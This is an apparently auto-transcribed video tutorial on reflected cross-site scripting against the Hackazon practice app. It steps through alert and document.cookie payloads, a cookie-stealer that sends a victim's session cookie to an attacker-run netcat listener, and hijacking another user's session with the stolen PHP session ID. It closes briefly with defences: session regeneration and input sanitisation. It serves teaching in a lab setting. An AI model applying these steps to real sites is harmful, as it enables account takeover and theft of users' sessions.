How Hackers Create Fake Links To Get Your Accounts!

How Hackers Create Fake Links To Get Your Accounts!

18.Aug.2021

hey guys welcome back to another episode
on
how to hack so here we're on hackazon
which is a vulnerable
platform making an electronic homicide
so
the first thing you should do right
whether it is for bug bounty whether it
is for web application penetration
testing
the whole idea is to get into the site
and understand 
how pages send data to other pages
right so what is the route of data so
where do
information gets transferred from one
page to another page
and what are the functions and features
available that we can utilize as part
of testing for vulnerabilities so in
this case once we land onto the page for
the first time
all we're going to do is look at page
and see where are all the different
pages so we can look at
on the top right corner we have signing
sign up we have a search
we have special selection so we can go
in and click onto any of the special
selection
and of course we can see onto the url
which is a very important
piece of data all right so here we have
question mark id with 16. so you can
easily change this to say
17 we can change this to 18.
all right so again we can understand
that they have an incremental approach
in actually managing all these different
products
in their database system so of course we
can go ahead and go to hackazone so
again one good thing about hackathon is
that
unlike traditional way of building
applications is use
it's actually using ajax as well as rest
apis for
pulling out all this data as well as
insertion of data so this is
something one more modern way of doing
web application deployment
so we can go under search products here
which is one of the
first places we can look at in terms of
doing some kind of
test so i can go in enter for example
nba and i can click on search
and of course we got a result here all
right search by mba we got a result here
and we can go ahead and click on it
right so we can see
the product the information and so on
and so forth
so going back here you can go under the
url so i'm going to go on to magnifier
so it's easier for you to see
i'm going to go under magnifier all
right and of course on a magnifier
we can look at the url and in this case
the url has search question mark id
equal and search string so there are a
number of parameters that we can input
into so this is the place
we're looking to fast or to actually try
to break
the system to inject our own code so one
of those areas that you can do
immediately is to look under input form
all right so i can go ahead and enter
for example script
script and we can enter alert
all right so you can enter whatever
information you want to and click on
search
and immediately we got a pop-up all
right it says hacked
by lloyd all right so we got all these
details here so this means that this
particular input fob is actually
vulnerable
to a cross-site scripting attack so
you'll be asking okay so
what can i do with it right because it's
all happening on your own browser
so the question is you know can we
impact this or affect
other users who are actually surfing the
site
all right so this is part of how
phishing attacks could actually work out
so what we can do next is to instead of
entering our own text field
we can enter other form of text view
okay so in this case i'm going to go
ahead and enter another
different kind of payload okay so i can
enter for example document
dot cookie and we can go ahead and click
under search
and in this case we got a lot more
information
okay we got php session id all right
and we have the visit products and all
those details all right so of course
what we can do next
is to craft our own payload as part of
the attack
so i'm going to jump into call linux
over here so in call linux
okay so again once i'm over here back
into the site
and of course we can sign in or sign up
and of course in this case
i can enter for example my own username
or my own password that registered as
part
of using the ecommerce site so i can go
ahead and enter username
all right and then i can enter the
password
and click sign in all right so once
we're in okay i'm not going to save any
information
so we have your account we have all
these different details right so i can
go to the top
right corner all right i can click under
web developer
i can click under storage inspector and
we can see that we
have the cookies information here under
the ip address of 192 168.0.199 so this
is the hackathon server ip address all
right so of course we have the value
over here
okay if i go back into the other user
who we are targeting
okay we're targeting this particular
browser to get the cookie's information
as part of a phishing attack
so if i click sign in so i have another
account here so i can go and enter
to all right so i can enter the password
again and i can click sign in all right
so i click under your account
i click on my profile and we can see
here we have the username
we have the email address we have the
first name last name and so on and so
forth
all right so going back to color linux
all right so i've actually created a
payload for you already so it's easier
for you to learn
so over here i have hackathon xxs
cookiestealer alright so again if you've
been
following the channel all right we have
done so many tutorials and lectures
for you to learn all about cyber
security with sql map and so on and so
forth right so in this case we have
hackers on
cross site scripting cookie stealer so
double click on this
all right so we actually have the
payload right here all right so i have
the following so we have
script so we're creating a new image and
in this case we're going to send the
data
all right we're going to send the data
to port 999i
all right with hacker.php question mark
output
and we have the document.cookie alright
so we got all this details here i'm
going to copy this
i'm going to go back to hackers on all
right i'm going to go back to hack is on
and i'm going to go under the search
again all right so of course what we're
going to do now is just change
at the url level or a search term level
okay we can change
the url level or system level okay so we
have this script here
all right so once you click under search
okay immediately would send
information okay into the
target server over here and of course in
this case
the target server as you can see all
right we have the ipaddr
so this is the ip address of the colix
linux machine that will be hosting
all right the collection point to
collect all those data it is going to be
sent over
into kala linux all right which is all
the document cookie okay so in this case
with 192 168.0.106.
all right so what we can do is of course
go ahead and click search all right so
and so forth so we get this url here
okay we got this url here so i'm going
to copy this url
all right i'm going to start up the
netcat server for us to actually
take in the inputs okay nc-lvp all right
followed by
9999 all right so this is the part
number that will be
taking in the information all right from
the document.cookie
of any user who clicked onto the link
okay so i'm going to click enter now
and i'm going to go back to the target
browser the target browser which is on
my host machine
so i go back here and now i'm currently
logged in as this right so i can
right click and i can paste it and hit
enter on this
okay and it states the fully search by
whatever okay so when i go back to call
linux
immediately here we can see the
information
okay so we have the php session id
all right so we got the details we got
the data to send over to call linux
right now
so then next question is what can
hackers do right now that they have the
php session id
is that what the hackers can do is that
they can copy the php session id copy
the selection
go back all right into their browser and
if you go on the view account again
i click on my profile this user okay
is the loy liang young at loyola.com all
right and of course the target browser
okay if i go back to my profile is two
all right so we're targeting the other
user so once you go back to call linux
i can just do double click on the value
all right remove the value and paste
the new php session id that we have
obtained hit enter on this
all right go back to your account click
my profile and immediately
okay i can do refresh and immediately
we have access to someone else's
profile okay and why is this happening
right in terms of the defense part
it's because the session the session
cookie document
actually persists from the web
application server setting
so it's very important to always refresh
the session id especially
when users log out when users exit their
profile
or when they have changes to different
attributes all right so these are very
important
points and aspects to take note of
especially when you're building
your web application systems right so
you definitely want the sessions to
refresh
upon different changes in the session
right so that
hackers will not be able to take those
details and data
and secondly secondly is that you want
to sanitize our inputs
so you can either sanitize it at the web
application firewall level
so you have a list you have a list of
payloads that are allowed
to be sent over into the application
server
all right so that those will be key
defense measures that you can undertake
to help protect
your sites from hacking okay so once
again i hope you've learned something
valuable in today's tutorial
and if you've any questions feel free to
leave a comment below and i'll try my
best to answer any of your questions
and we'll like share and subscribe to
our channel so that you can be kept
abreast
of the latest cyber security tutorial
thank you so much once again for
watching

We are social